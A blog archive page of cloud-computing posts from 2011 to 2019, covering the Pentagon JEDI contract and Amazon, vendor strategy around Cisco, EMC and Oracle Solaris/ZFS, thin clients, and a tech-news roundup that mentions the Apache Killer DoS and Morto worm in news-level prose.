Showing posts with label cloud computing. Show all posts

Monday, November 4, 2019

Distributed Denial of Service, Amazon Cloud & Consequences

[Amazon Web Services Logo, Courtesy Amazon]


Abstract

The US Military has been involved in advancing the art of computing infrastructure since the early days of computing. With many clouds already built inside the Pentagon, an initiative arose to standardize on a single external cloud vendor. Unlike many contracts, where vendors compete with one another for a piece of the pie, this was a "live and let die" contract for the whole proverbial pie, not just a slice. Many vendors & government proponents did not like this approach, but the proverbial "favoured son", who already held a CIA contract, approved. This is that son's story.


Problems of Very Few Large Customers

Very few large customers create distortions in the market.
  1. Many understand that consolidating smaller contracts into very few large contracts is unhealthy. A few very large single consumers, like the Military, create an environment where suppliers exit the business if they cannot win some business, since the number of buyers is too small - limiting the pool of possible suppliers in time of war.
  2. Some complain that personal disputes can get in the way of objective decision making in large business transactions.
  3. Others warn that political partisanship can wreck otherwise terrific technology decisions.
  4. Many complain that a few large contracts offer opportunities for corruption at many levels, because the stakes are so high for the huge entities trying to win that business.
  5. In earlier days, mistakes by smaller suppliers offered an opportunity for correction before the next bid... but when very few bids are offered, such fleeting opportunities require substantially deep pockets to survive a bid loss.
  6. Fewer customer opportunities discourage innovation, since the risk of being innovative may result in the loss of an opportunity, when the few RFP issuers may be rigidly bound by the constraints of older technology requirements and discouraged from higher-cost newer technology.
In the end, these logical issues may not have been the only realistic problems.


[Amazon Gift Card, Courtesy Amazon]

Amazon's Business to Lose

From the very beginning, Amazon's Jeff Bezos had a way in. Former Defense Secretary James Mattis hired Washington DC lobbyist Sally Donnelly, who formerly worked for Amazon, and the Pentagon was soon committed to moving all of its data to the private cloud. The irony is that Bezos, who has a bitter disagreement with President Trump, had, in 2017, a proverbial "ring in the nose" of President Trump's "second in command" over the Armed Forces.

Amazon's Anthony DeMartino, a former deputy chief of staff in the Secretary of Defense's office who had previously consulted for Amazon Web Services, was also extended a job at Amazon after working through the RFP process.

Features in the RFP suspiciously looked as though they were tailor-written for Amazon, requesting capabilities that only Amazon could offer. Competitors like Oracle had changed their whole business model, redirecting all corporate revenue into Cloud Computing, just to meet the $2 Billion revenue requirement to be allowed to bid on the RFP! How did such requirements appear?

Amazon's Deap Ubhi left the AWS Cloud Division to work at the Pentagon, to create the JEDI procurement contract, and later returned to Amazon. Ubhi, a venture capitalist, worked as one of a four-person team shaping the JEDI procurement process, while in secret negotiations with Amazon to be re-hired for a future job. The Intercept further reminded us:
Under the Procurement Integrity Act, government officials who are “contacted by a [contract] bidder about non-federal employment” have two options: They must either report the contact and reject the offer of employment or promptly recuse themselves from any contract proceedings.
The Intercept also noted that Ubhi accepted a verbal offer from Amazon for the purchase of one of the companies he owned, during the time he was working on the Market Research that would eventually form the RFP.

A third DoD individual, who also helped tailor the RFP, was likewise offered a job at Amazon, according to Oracle court filings, but this person's name was redacted from the record.

At the highest & lowest levels, the JEDI contract appeared to be "Gift-Wrapped" for Amazon.

[Amazon CEO Jeff Bezos hosting Trump's Former Defense Secretary James Mattis at HQ, courtesy Twitter]

Amazon Navigating Troubled Waters

December 23, 2018, President Trump pushes out Secretary of Defense James Mattis after Mattis offered a resignation letter, effective February 2019.

January 24, 2019, the Pentagon investigates Oracle's concerns of unfair practices, after a worker on the cloud procurement contract was hired from Amazon.

April 11, 2019, Microsoft & Amazon become finalists in the JEDI cloud bidding, knocking out other competitors like Oracle & IBM.

June 28, 2019, Oracle Corporation files a lawsuit against the Federal Government for creating RFP rules which violate various Federal Laws, passed by Congress, to restrict corruption. Oracle also argued that three individuals who tilted the process towards Amazon were effectively "paid off" by receiving jobs at Amazon.

July 12, 2019, Judge rules against Oracle in lawsuit over bid improprieties, leaving Microsoft & Amazon as finalists.

August 9, 2019, newly appointed Secretary of Defense Mark Esper was to complete "a series of thorough reviews of the technology" before the JEDI procurement is executed.

On August 29, 2019, the Pentagon awarded its DEOS (Defense Enterprise Office Solutions) cloud contract, a 10-year, $7.6 billion deal, to Microsoft, based upon its 365 platform.

On October 22, 2019, Secretary of Defense Mark Esper withdrew from reviewing bids on the JEDI contract, due to his son being employed by one of the previous losing bidders.

Serendipity vs Spiral Death Syndrome

Serendipity is the occurrence and development of events by chance with a beneficial result. The opposite may be Spiral Death Syndrome, when an odd event creates a situation where catastrophic failure becomes unavoidable.

What happens when an issue, possibly out of the control of a bidder, becomes news during a vendor choice?

This may have occurred with Amazon AWS, in their recent bid for a government contract. Amazon pushed to have the Pentagon clouds outsourced, lobbying at one level below The President, and even had the RFP rules written to favor a massive $10 Billion, 10-year, single-contract agreement favoring them.

October 22, 2019, Amazon Web Services was hit by a Distributed Denial of Service (DDoS) attack, taking down users of Amazon AWS for hours. Oddly enough, it was a DNS attack, centered upon Amazon S3 storage objects. External vendors measured the outage at 13 hours.

On October 25, 2019, the Pentagon awarded its JEDI (Joint Enterprise Defense Infrastructure) cloud contract, a 10-year, $10 billion deal, to Microsoft. The Pentagon had over 500 separate clouds to be unified under Microsoft, and it looks like Microsoft will do the work with the help of smaller partners.

Conclusions:

Whether the final choice of the JEDI provider was Serendipitous for Microsoft, or the result of Spiral Death Syndrome for Amazon, is for the reader to decide. For this writer, the final stages of choosing a bidder, where the favoured bidder looks like they could have been manipulating the system at the highest & lowest levels of government, even having the final newly installed firewall [Mark Esper] torn down 3 days earlier, is an amazing journey. A 13 hour cloud outage seems to have been the final proverbial "nail in the coffin" for a skilled new bidder who was poised to become the ONLY cloud service provider to the U.S. Department of Defense.

(Full Disclosure: a single cloud outage for Pentagon data lasting 13 hours, just before a pre-emptive nuclear attack on the United States & European Allies [under our nuclear umbrella], could have been not only disastrous, but could have wiped out Western Civilization. Compartmentalization of data is critical for data security, and the concept of a single cloud seems half-baked, in the opinion of this writer.)

Tuesday, January 22, 2013

Cisco Fires Shot at EMC: Parallels to Replace VMWare?

A very short update on Cloud Computing...

EMC: Build Their Own Server...
We remember that during EMC World in June 2012, EMC started the process of building their own cloud system... without Cisco.

EMC: The Missing Switch...
EMC's VMWare acquired Nicira, to fix the hole in their networking stack, as discussed during VMworld 2012 in August 2012. VMWare also started selling cloud engineering professional services.

Cisco: The Missing Hypervisor...
This left Cisco in a very difficult position - where would Cisco go to get a hypervisor? Cisco just took a significant equity stake in Parallels, in order to gain one. Perhaps they should have thought about KVM on Illumos.

EMC & Cisco: The Missing OS...
While EMC and Cisco are continuing to gobble up components (still missing an OS) for their proprietary clouds, Oracle had already released The First Cloud OS back in 2011 - it was called Solaris 11. Of course, Microsoft can't be left behind, copying Oracle and claiming Windows Server 2012 is the First Cloud OS! LOL!


Of course, Illumos is still an option for both EMC and Cisco... and Cisco would not have needed to buy an equity stake in Parallels, had they gone the Illumos route from the beginning. Joyent has been selling Clouds on Illumos for some time, even appearing in Gartner's Magic Quadrant starting in 2009.

What was Cisco thinking?

Wednesday, July 18, 2012

From Cloud 1.0, to Cloud 2.0, to Cloud 3.0

Abstract:
Meg Bear, Vice President, Oracle Cloud Social Platform, published an opinion blog article titled "Multi-Tenancy and Other Useless Discussions." Cited were two articles regarding "very strong opinions on either side of the multi-tenancy divide." The irony in this opinion article is that Meg does not seem to understand that Oracle has the technological lead among the giants in this arena, but is quickly losing that position. A subset of this post was submitted as a comment on Wednesday, July 18th, a little after mid-day.

Oracle's Position
With the advance of massive ZFS storage capabilities from Oracle, combined with hypervisors, there is tremendous opportunity for cloud-based solutions to provide customers with incredible customization options.

Multi-tenancy offers the ability to deliver consistent levels of service and features across multiple customers. Multi-tenancy also reduces overhead for the service provider, lowering the cost of managing the solutions - which leads to greater application availability. Oracle has superior products which technologically corner this market.

A multi-tenant solution does not mean that every customer has to be on the same version of the software. New versions of the software can be rolled out in parallel, and customers can "choose" which version they wish to be under... the former release or the newer release. Good multi-tenant solutions should never be monolithic; rather, they should be modular and parallel.

The less capable an individual software solution is, the fewer isolation, scalability, and management features are offered. Less mature solutions do not offer multi-tenancy. It is not necessarily an issue of "Cloud V1" vs "Cloud V2", as the Oracle CEO suggested - it is an issue of cloud solution maturity.



Let us illustrate:
The Oracle VM for SPARC hypervisor offers advanced Oracle ZFS filesystem capabilities:
  • massive dataset capability;
  • encrypted datasets on a per-customer basis - for storage, over-the-wire, and memory buffers - for security;
  • superior performance, with hardware acceleration of compression (T5) and encryption (T1-T5);
  • guaranteed data integrity & correction from the OS, through the hypervisor, through memory, through the HBA, over the wire, to storage, and to the disk (at every layer of the stack);
  • much higher capacity & throughput via ZFS deduplication in memory, via the hypervisor, over-the-wire, and on disk storage (and not just over the disk bus);
  • vastly superior visibility and analytics for live production systems, with no application interruption, via DTrace at every level - hypervisor, OS kernel, Java, and application.
Oracle owns all of this multi-tenant technology under "Cloud 1.0" - nearly everyone else just borrows some pieces to produce a popular (but technologically inferior) solution.
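As a hedged sketch of the per-customer encryption, compression, and deduplication described above (pool, dataset, and zone names are hypothetical; assumes a Solaris 11 system with ZFS encryption support):

```shell
# Sketch only: one encrypted, compressed, dedup-enabled ZFS dataset
# per tenant, delegated into that tenant's zone (hypothetical names).
zfs create -o encryption=on -o keysource=passphrase,prompt \
           -o compression=gzip -o dedup=on rpool/tenants/customerA

# Delegate the dataset to the customer's zone for isolated management.
zonecfg -z customerA-zone \
  'add dataset; set name=rpool/tenants/customerA; end'
```

Each tenant's data is then encrypted and space-reduced independently, without the other tenants (or the provider's admins outside the zone) seeing it.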


Why is this brought up?
These capabilities are notably missing from the Oracle VM for Intel hypervisor - the basis for "Cloud 2.0". Clouds based upon this solution are not as robust. Moving ZFS to a dedicated storage infrastructure leaves gaping holes. From a cloud service delivery perspective, ZFS would need to run at the hypervisor or OS layer in order to: correct hidden data corruption introduced at and below the hypervisor layer (memory, backplane, HBA, wiring, etc.); provide throughput improvement via compression & deduplication (in memory, across the backplane, in the hypervisor, over-the-wire, and in the storage subsystem); and provide massive storage capacity.


Security, data integrity, and performance drive multi-tenancy requirements. Applications run under both "Cloud 1.0" and "Cloud 2.0" solutions. The Oracle VM for Intel hypervisor needs to "get with the program" and gain some of these [nearly 10 year old] security, data integrity, and performance technologies leveraged by service providers in the traditional "Cloud 1.0" multi-tenant market, as well as by some "Cloud 2.0" (Oracle-derived, but now independent) service providers.



Right now, there seem to be three technologies which completely satisfy the market needs suggested by the CEO for "Cloud 2.0": Oracle VM for SPARC clouds (Oracle is leaving this to other multi-tenant providers); Xen for Solaris Intel clouds (Oracle discarded it); and KVM for OpenSolaris under Intel (Joyent produced SmartOS, based upon Illumos, based upon OpenSolaris.)


ZFS, Encryption, Compression, Deduplication, and Visibility are the technologies today. Filesystem clustering is tomorrow. Everything else is "just a cloud" floating by... based upon commodity Linux, without data integrity, without data security, without performance, without visibility, without clustering - but there is a thunderhead on the horizon.

Clustered filesystems in conjunction with ZFS fill a bigger hole, in what should be called the "Cloud 3.0" market. Honestly, a Cloud should use clustered filesystems with the data everywhere, the data encrypted everywhere, the data compressed everywhere, and the data deduplicated everywhere (and, of course, this means memory, the wire, and the storage.)


Intel x64, IBM POWER, and Oracle [any-architecture]
The HPC market is nothing more than a specialized cloud. Intel purchasing Whamcloud (for Oracle Lustre on Linus's Linux on Intel's x64), and IBM layering Oracle Lustre on Oracle ZFS on Linus's Linux on IBM POWER, show where the cloud market is moving. IBM is pulling off what Oracle could not do, years after the purchase of Sun Microsystems. The market is clearly and proverbially "throwing down the gauntlet".

Oracle is the only vendor on the horizon who has the possibility of clearly layering Clustering on ZFS with full visibility, without sacrificing the performance of a Kernel implementation of ZFS and Lustre, under Oracle Solaris with a Solaris hypervisor, to produce (what I would refer to as) "Cloud 3.0".


If Oracle does not capitalize on "Cloud 3.0" by bundling Lustre, ZFS, and Solaris (on Intel with Xen, on SPARC with LDoms) - Oracle "Cloud 1.0" multi-tenancy will still continue to be the 1000 pound gorilla in the room. Oracle (and nearly every other vendor, outside of Joyent) are "Cloud 2.0" Rhesus Monkeys, lacking DTrace visibility and in-kernel clustering & ZFS. "Cloud 3.0" has the potential to dominate Oracle in technical capability, using derived Oracle technologies like ZFS, Lustre, and Xen (which both Oracle and Sun participated in.)

With every technology Oracle ports to Oracle Linux, more technology is "given away" to its competitors, as it is absorbed "upstream" and sucked into Red Hat and SUSE - who are the recognized Linux vendors.

Network Management:
Network Management platforms used by Telecommunication Service Providers depend upon large multi-tenant software solutions. With Oracle Linux not showing up on Network Management software vendors' support lists, the only serious options are SPARC Solaris, Intel Red Hat Linux, and Intel Windows.

The lack of an integrated clustered filesystem with ZFS under Solaris has long dogged the telco providers. The drive towards Red Hat was relentless. The push by Oracle to "Cloud 2.0", without ever providing a technologically superior "Cloud 2.0" alternative under Intel (Windows, Linux, or Solaris), has left Oracle largely out of the picture.

The drive to "Cloud 3.0" appears strangely dim for Oracle, while it looks promising for OpenSolaris-dependent vendors like Joyent. OpenSolaris-based technologies (Solaris 11, SmartOS, Illumian, OpenIndiana, etc.) are superior to the dominant market players, but this could be pre-empted by Intel or IBM, as they fund the contribution of Oracle technologies to Linus and his Linux - to suck all value out of Oracle's "Cloud V1" and provide a superior "Cloud V2" solution to anything that Oracle is supplying today.

 

Wednesday, June 20, 2012

EMC: Building The Cloud, Kicking Cisco Out?


Abstract:
EMC used to be a partner in the Data Center, with a close relationship with vendors such as Sun Microsystems. With Sun's move to create ZFS and their own storage solution, the relationship was strained, and EMC responded by suggesting the discontinuance of software development on Solaris platforms. EMC purchased VMWare and entered into a partnership with Cisco - Cisco produced the server hardware in the Data Center, while EMC provided VMWare software along with EMC storage. The status quo is poised for change, again.

[EMC World 2012 Man - courtesy: computerworld]

EMC World:
Cisco, a first-tier network provider of choice, started building their own blade platforms and entered into a relationship with EMC for storage and OS virtualization (VMWare) technology. EMC announced just days ago, during EMC World 2012, that they will start producing servers. EMC - a cloud virtualization provider, a cloud virtual switch provider, a cloud software management provider, and a cloud storage provider - has now moved into the cloud server business.

Cisco Response:
Apparently aware of the EMC development work before the announcement, Cisco released FlexPods with NetApp. The first release of FlexPods can be managed by EMC management software, because VMWare is still the hypervisor of choice. There is a move towards supporting Hyper-V in a future release of FlexPods. There is also a movement towards providing a complete management solution through Cisco Intelligent Automation for Cloud. Note that EMC's VMWare vCenter sits as a small brick in the solution Cisco assembled through acquisitions, including NewScale and Tidal.

[Cisco-NetApp FlexPod courtesy The Register]

NetApp Position:
NetApp's Val Bercovici, CTO of Cloud, declares "the death of [EMC] VMAX." Cisco was rumored to be in a position to buy NetApp in 2009 and 2010; now, with EMC marginalizing Cisco in 2012, NetApp becomes more important - and NetApp's stock is dropping like a stone.
[former Sun Microsystems logo]
Cisco's Mishap:
Cisco - missing server hardware, a server hypervisor, a server operating system, tape storage, disk storage, and management technologies - decided to enter into a partnership with EMC. Why this happened is puzzling: system administrators in data centers used to use identical console cables for Cisco and Sun equipment - that should have been their first clue.

Had Cisco been more forward-looking, they could have purchased Sun and acquired all of their missing pieces: Intel, AMD, and SPARC servers; Xen on x64 Solaris; LDoms on SPARC; Solaris on Intel and SPARC; StorageTek; ZFS Storage Appliances; and Ops Center for multi-platform systems management.

Cisco now has virtually nothing but blade hardware and some recently acquired management software [NewScale and Tidal]... will NetApp be next?

[illumos logo]

Recovery for Cisco:
An OpenSolaris base with hypervisor and ZFS is the core of what Cisco really needs to rise from the ashes of their missed purchase of Sun and unfortunate partnership with EMC.

From a storage perspective, ZFS is mature, providing a near-superset of all features offered by competing storage subsystems (where is the embedded Lustre?) If someone could bring clustering to ZFS, there would be nothing missing - making ZFS a complete superset of everything on the market.

Xen was created around the need for OpenSolaris support, so Xen could easily be resurrected with a little investment by Cisco. Cloud provider Joyent created KVM on top of OpenSolaris and donated the work back to Illumos, so Cisco could easily fill their hypervisor need, to compete with EMC's VMWare.

[SmartOS logo from Joyent]
SGI figured out they needed a first-class storage subsystem, and placed Nexenta (based upon Illumos) in their server lineup. What Cisco really needs is a company like Joyent (based upon Illumos) - to provide storage and a KVM hypervisor. Joyent would also provide Cisco with a cloud solution - a completely integrated stack, from the ground on up... not as valuable as Sun, but probably a close second, at this point.

Wednesday, May 30, 2012

Ops Center: Manage Mission Critical Apps in the Cloud



Abstract: 
This short video demonstrates how Oracle Ops Center, included in all Oracle hardware service contracts, manages a private cloud hosting applications.
 

Wednesday, May 23, 2012

Cloud Migration: iPhone, iPodTouch, iPad



I came across a quick blog posting from Cloud Migration today:
I just keep thinking that the proliferation of iPads and tablets in the enterprise is leading us back to the path of thick client computing. Don't get me wrong, I love the iPad and believe it is a great device....for emails, surfing the web, playing music, playing games, and getting directions. However, it is as thick of a client device as you can get. In addition, just like 3270 screens were proprietary, they are a proprietary platform. It seems like just yesterday everyone was rushing to get off of client/server systems and move to thin client machines with browser based access.
Of course, I thought this was interesting, but this left me with a bunch of thoughts:

> proliferation of iPads and tablets in the enterprise is leading us back
> to the path of thick client computing

That is a very interesting thought.
  • UNIX is the firmware in the iPad, iPodTouch, iPhone
  • UNIX does not make it thick, Sun Workstations were thin
  • UNIX makes i* more Open.
There is virtually no customization on the client end,
so I don't quite think that i* are thick clients.


> just like 3270 screens were proprietary

iPhones and iPads were specifically called out; "tablets" suggests Windows, but Android is not quite Open...
  • Does Android comply with POSIX? OpenFirmware?
  • Is Android getting sued for using Java?

What are the thin alternatives?
  • SunRays used to be SPARC based, but no longer. SPARC was Open.
  • SunRays were never based upon Solaris. Solaris was Open.
  • SunRays used a proprietary firmware, not based upon OpenBoot.
The SunRays are more of an ultra-thin form factor, with firmware
that updates automatically (much the same way that i* devices
will, except the i* devices prompt the user for a convenient time
to update, with the ability to customize their firmware.)

Other thoughts about thin clients:
  • I don't see SunRays in i* or tablet form-factors.
  • I don't see SunRays being sold by TelCo providers,
    as basic utilities leveraging their network infrastructure.
  • I don't see SunRay clients provided by non-Oracle vendors.

Don't get me wrong: I have 3 SunRays on my desktop at this very moment,
running SPARC Solaris OpenLook desktops (CDE and JDS are way too heavy
and difficult to customize for real business usage.) All our users run
third-party apps off of an internal Solaris cloud that I built years ago.

Right now, the i* form factor is less expensive, easier to use,
and perceived as more open than other thin client technologies.

Honestly, there is no reason why clouds should not be built on SunRays.


If clouds are not using SunRays, then Oracle needs to figure out how to
fix that, and I will be the first one on board to advocate migrating my
decade-old private Solaris SPARC cloud serving 300 thin clients!

Thursday, December 29, 2011

Solaris 11: A Cloud in a Box!

Abstract:
The computing industry began with resources centralized on singularly large computing platforms. The microprocessor brought computing power into the hands of individuals in homes and offices, but information was still centralized in each location. The creation of The Internet allowed for the sharing of information between homes and offices around the globe. Reliable server and telecommunications infrastructure was required to make it work, and applications were somewhat limited to a handful of standard Internet protocols, such as HTTP. Cloud Computing has been coming of age over the past number of years, driving custom applications to proprietary API's in order to move more applications onto the Internet, but this is quickly changing as operating system vendors include more robust virtualization. Cloud Computing is really about the virtualization of Internet infrastructure, including servers, to a point where the pieces do not have to reside on the Internet, nor in an office, nor just split between the two - they can reside anywhere, including entirely in a laptop. Solaris 11, the first Cloud Operating System, offers the ability to virtualize everything, from entire data centers across thousands of platforms, to thousands of platforms virtualized on a laptop.

Simulating The Cloud: A Practical Example

Joerg M., an Oracle employee and publisher of C0T0D0S0, discusses Solaris 11 and some of its features, demonstrating the building of a cluster of virtual data centers within a single operating system instance. If someone runs a data center, they should consider reviewing the article to better comprehend what a "Cloud" could and should be.

It should be noted that the "create-simnet" and "modify-simnet" subcommands are formally undocumented, but they are documented in the released OpenSolaris source code and leveraged in various derived Open Source branches - one of the most important distributions being the Joyent SmartOS cloud operating system.
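A minimal sketch of those subcommands (link names are hypothetical; this must run as root on Solaris 11 or an illumos derivative, since simnet support lives in the kernel):

```shell
# Sketch: two simulated NICs "wired" together, forming a virtual
# network segment entirely inside one OS instance (hypothetical names).
dladm create-simnet net0sim             # first simulated NIC
dladm create-simnet net1sim             # second simulated NIC
dladm modify-simnet -p net0sim net1sim  # peer them, like a crossover cable
dladm create-vnic -l net0sim vnic0      # hang a VNIC off the simulated link
```

VNICs, virtual routers, and zones can then be stacked on these links exactly as they would be on physical NICs, which is what makes the "data center in a box" exercise possible.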

Not Included, but Not Out Of Scope

What is not included in Joerg's example are actual systems on the edges of the cloud. Adding them is actually simpler than adding the virtual routers which were created: add virtual interfaces, virtual systems, databases to virtual systems, middleware to virtual systems, and applications to virtual systems; add bandwidth & latency limitations to WAN links; add port limitations to virtual firewalls; etc.

Why Go Through the Exercise?

Once someone builds the entire datacenter "in the box", creation of the real data center becomes trivial. But why does this matter?
  • For the first time, real test environments can be simulated, soup-to-nuts, in an inexpensive way. There is no charge for virtualization in a Solaris world.
  • Costs can be reduced by placing all development systems into a couple of "clouds" for virtually any number of applications (Solaris supports over 4000 zones on a single OS instance)
  • Movement of an application from development to test is as easy as cloning a Zone and instantiating the clone on a Test platform.
  • Costs can be reduced by placing all test systems into a couple of clouds for virtually any number of applications
  • Deploying tested application is as easy as instantiating the cloned test Zone on a production system
  • Disaster recovery is as easy as instantiating the Zone on the dead physical system onto a physical system in an alternate data center.
  • Deploying production applications into a cloud is as easy as backing up the application and restoring it into the cloud - not to mention bringing it back.
  • The interactions of the application with Firewalls, WAN's and LAN's are all well understood, with everything being properly developed and tested, making each production deployment seamless
The effort, with a step-by-step process, will ensure that there are no missed steps in bringing virtualization to a business.
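The clone-and-promote step in the list above can be sketched as follows (zone names and paths are hypothetical; assumes Solaris 11 zones on ZFS, run as root):

```shell
# Sketch: promote a development zone to test by cloning it
# (hypothetical zone names and zonepaths).
zoneadm -z devzone halt                          # source zone must be down
zonecfg -z devzone export -f /tmp/devzone.cfg    # capture its configuration
sed 's|/zones/devzone|/zones/testzone|' \
    /tmp/devzone.cfg > /tmp/testzone.cfg         # give the copy its own path
zonecfg -z testzone -f /tmp/testzone.cfg         # register the new zone
zoneadm -z testzone clone devzone                # ZFS snapshot makes this fast
zoneadm -z testzone boot
```

Because the clone is backed by a ZFS snapshot, the copy is nearly instantaneous and consumes almost no additional disk until the test zone diverges.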

Implications to Network Management

The world is slowly exiting the physical realm, and Network Management is no longer about monitoring edge routers and links - it is about monitoring virtualized infrastructure. Orchestration is all about automated deployment, and cloud providers are getting better at this. The missing piece of this puzzle is robust SNMP management of everything. The creation of network management infrastructure needs to happen in the development clouds first, then the test clouds, so that when the jump to production is complete, the management infrastructure has already been developed and tested alongside the applications.
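As a small, hedged illustration (hostname and community string are placeholders; assumes the standard net-snmp command-line tools), polling a virtualized router's interface table over SNMP is no different from polling a physical one:

```shell
# Sketch: walk the interface description table of a virtual router
# (hypothetical host "vrouter1.example.com", community "public").
snmpwalk -v2c -c public vrouter1.example.com IF-MIB::ifDescr
```

The point is that the same SNMP tooling exercised against development and test clouds carries over unchanged to production.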

Monday, August 29, 2011

Technical Posts 2H August


The following are technical articles related to Network Management in the past half-month.
  • Security: 'Devastating' Apache bug leaves servers exposed

    Attack code dubbed “Apache Killer” that exploits the vulnerability in the way Apache handles HTTP-based range requests was published Friday on the Full-disclosure mailing list. By sending servers running versions 1.3 and 2 of Apache multiple GET requests containing overlapping byte ranges, an attacker can consume all memory on a target system.

    The denial-of-service attack works by abusing the routine web clients use to download only certain parts, or byte ranges, of an HTTP document from an Apache server. By stacking an HTTP header with multiple ranges, an attacker can easily cause a system to malfunction.
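The overlapping-ranges trick can be sketched in POSIX shell (the host name is a placeholder, and this only prints the request - it sends nothing; never aim such a request at a server you do not own):

```shell
#!/bin/sh
# Sketch: build the kind of stacked, overlapping Range header the
# "Apache Killer" tool used. HOST is a placeholder; nothing is sent.
HOST="victim.example.com"
ranges="0-"
i=1
while [ "$i" -le 50 ]; do
  ranges="$ranges,5-$i"    # dozens of overlapping byte ranges
  i=$((i + 1))
done
printf 'HEAD / HTTP/1.1\r\nHost: %s\r\nRange: bytes=%s\r\n\r\n' \
       "$HOST" "$ranges"
```

Each overlapping range forces the vulnerable Apache versions to buffer another copy of the requested region, which is how a single small request exhausts server memory.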

  • Mobile: Dish eyes 4G LTE wireless network

    The radio spectrum owned by Dish, and LightSquared, is reserved for satellites, but as satellite transmissions have a hard time penetrating buildings and terrain operators are allowed to build an Ancillary Terrestrial Component* – infill transmitters operating at the same frequency as the birds and providing signal to those without line of sight.

    LightSquared turned that model on its head, suggesting that the ground-based network would be primary, with the satellite providing in-fill: estimated at around 2 per cent of traffic. LightSquared then successfully lobbied the FCC to permit it (and its wholesale customers) to ship equipment that isn't even capable of satellite communications, turning the company into a 4G network wholesaler without having to shell out for 4G spectrum.

  • Security: Worm spreading via RDP

    an Internet worm dubbed “Morto” spreading via the Windows Remote Desktop Protocol (RDP).

    F-Secure is reporting that the worm is behind a spike in traffic on Port 3389/TCP. Once it’s entered a network, the worm starts scanning for machines that have RDP enabled. Vulnerable machines get Morto copied to their local drives as a DLL, a.dll, which creates other files detailed in the F-Secure post.

    SANS, which noticed heavy growth in RDP scan traffic over the weekend, says the spike in traffic is a “key indicator” of a growing number of infected hosts. Both Windows servers and workstations are vulnerable.

  • Cloud: Java arrives on Heroku code cloud

    Heroku – the multi-language "platform cloud" owned by Salesforce.com – is now running Java applications.

    Akin to Google App Engine, Microsoft Azure, or VMware's Cloud Foundry, Heroku is an online service for building, deploying, and readily scaling applications. It was originally designed for Ruby on Rails apps, but has since expanded to Clojure, Node.js, and now Java.

  • Mobile: Why Apple is Removing Unique Identifiers

    Apple is planning to phase out unique device identifiers from iOS 5, according to documentation sent out to developers, possibly to stop people worrying about their privacy on iPhones and iPads. Instead, developers are told they should "create a unique identifier specific to your app".

    [Wall Street Journal] Henschel also pointed to the recent spat between the notoriously secretive Apple and analytics firm Flurry as a possible spur for the move. In January, Flurry reported that it had identified around 50 tablet devices in testing at Apple's campus in Cupertino using its analytics.

    "Some company called Flurry had data on devices that we were using on our campus – new devices," Jobs said live at the D8 conference. "They were getting this info by getting developers to put software in their apps that sent info back to this company! So we went through the roof. It's violating our privacy policies..."
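    The replacement pattern is simple enough to sketch. The Python below is only an analogy to what Apple is telling iOS developers (who would do this in Objective-C): generate a random identifier once, persist it per app, and reuse it, so that no two apps share a trackable device-wide ID. The file name and JSON layout are hypothetical.

```python
import json
import os
import tempfile
import uuid

def app_identifier(path):
    """Return a persistent identifier scoped to one app install,
    generated on first use -- unlike a device-wide UDID that every
    app (and every analytics SDK) can read."""
    if os.path.exists(path):
        with open(path) as f:
            return json.load(f)["id"]
    ident = str(uuid.uuid4())
    with open(path, "w") as f:
        json.dump({"id": ident}, f)
    return ident

store = os.path.join(tempfile.gettempdir(), "demo_app_id.json")
first = app_identifier(store)
second = app_identifier(store)
print(first == second)  # True: stable for this app, opaque to others
```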

  • Mobile: Nokia accidentally unveils OS it should have had in 2009

    Nokia is expected to unveil a major refresh of its Symbian OS today, bringing it bang up to date with competitive phones from two years ago. Owners of more recent Symbian^3 models should be able to update their handsets eventually.

    Four new devices are expected to be unveiled – either today, or very shortly. The Belle update should keep loyalists happy for some time to come. Performance and usability appear to have been improved greatly.

  • Cloud: Performance Monitoring is Someone Else's Problem

    “Amazon and Google don’t have an army of service operatives monitoring their farms,” says Graeme Swan, a partner at consultancy Ernst & Young. “They basically smashed as much infrastructure as they possibly could into warehouses, and then just assumed that capacity would be there. Now, clients are telling them they want a premium service. They are worried that they have no way of monitoring it or tweaking it. So there is no premium service.”

    You can buy as much premium support as you like (although some question how well it works). Premium performance streams? Not so much.

  • Cloud: VMware turns shrink ray on open source dev cloud

    On Wednesday, the virtualization giant introduced Micro Cloud Foundry, a free downloadable version of its Cloud Foundry service that runs on a single laptop. This past spring, when VMware unveiled Cloud Foundry and open sourced the code behind it, the company indicated it would eventually offer a shrunken incarnation that would allow developers to test applications on their local machines.

  • Cloud: VMware turns self into (virtual) database co.

    vFabric Data Director has a utility pricing model, as you would expect: $600 per year for each VM under management that is running a database image. vFabric Postgres, VMware's tweaked and tuned version of PostgreSQL, is available free of charge for developers and can be downloaded starting today at cloudfoundry.com.

    If you put a vFabric Postgres image into production, then it costs $1,700 per VM per year. The underlying vFabric 5.0 Standard Edition costs $1,200 per VM per year, while the Advanced Edition, which has more bells and whistles, costs $1,800 per VM. The Advanced Edition includes RabbitMQ messaging and an SQL interface for GemFire called SQLFire.
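    Those per-VM prices compose into an annual bill. Here is a back-of-the-envelope sketch using the figures above, assuming the production Postgres charge stacks on top of the underlying vFabric edition license (the article implies this but does not state it outright):

```python
# List prices from the article, per VM per year.
VFABRIC_POSTGRES_PROD = 1700  # production vFabric Postgres image
VFABRIC_STANDARD = 1200       # vFabric 5.0 Standard Edition
VFABRIC_ADVANCED = 1800       # Advanced Edition (adds RabbitMQ, SQLFire)

def annual_cost(vms, edition=VFABRIC_STANDARD):
    """Yearly list price for `vms` production Postgres VMs,
    assuming the database and edition charges stack."""
    return vms * (VFABRIC_POSTGRES_PROD + edition)

print(annual_cost(10))                    # 29000
print(annual_cost(10, VFABRIC_ADVANCED))  # 35000
```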

  • Cloud: Dell floats cloud built on ... VMware

    At the VMworld virtualization and cloud extravaganza in Las Vegas today, Dell said that it was fluffing up the Dell Cloud using VMware's brand-spanking-new ESXi 5.0 hypervisor, the vSphere 5.0 management tools for it, the vCloud Director cloud fabric, and the vCloud Connector extensions that allow a private cloud and a slice of a public cloud to be managed from the same console and to teleport jobs back and forth from the public and private clouds.

    The Dell Cloud comes out of the Dell Services unit, which is the amalgam of Dell's server and PC support business and consulting services practice with the Perot Systems system and application outsourcing business it acquired in September 2009 for $3.9bn.

  • Cloud: HP mates blades with VMware vSphere

    The VirtualSystem VS2 configuration for vSphere 5.0 moves to a bladed server and bladed LeftHand P4800 SAN arrays. The VS2 setup has a dozen BL460c G7 two-socket Xeon blade servers and two BladeSystem c7000 blade server chassis. Each blade has a dozen cores running at 3.06GHz.

    The largest VirtualSystem for vSphere 5.0 setup is the VS3 box, which is designed to support up to 6,000 VMs. This monster has four BladeSystem c7000 chassis and a total of 64 of HP's ProLiant BL460c G7 servers.

